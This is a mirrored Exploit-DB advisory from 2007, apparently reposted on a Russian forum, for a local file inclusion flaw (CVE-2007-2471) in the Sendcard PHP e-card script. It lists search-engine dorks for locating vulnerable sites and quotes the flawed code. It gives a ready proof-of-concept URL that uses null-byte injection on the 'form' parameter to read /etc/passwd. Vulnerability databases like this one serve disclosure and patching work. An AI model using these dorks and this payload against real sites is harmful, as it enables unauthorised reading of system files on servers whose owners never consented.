- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3827
- Проверка EDB
-
- Пройдено
- Автор
- ETTEE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2471
- Дата публикации
- 2007-05-01
Код:
Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability
Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
"powered by Sendcard"
Bug:
"// Get the template details
if(!isset($form) || $form == ''){
$form = "form";
}
if(!isset($des) || $des == ''){
$des = "card";
}
if (!isset($template) || $template == '') {
$template = 'message';
}"
PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00
# milw0rm.com [2007-05-01]- Источник
- www.exploit-db.com
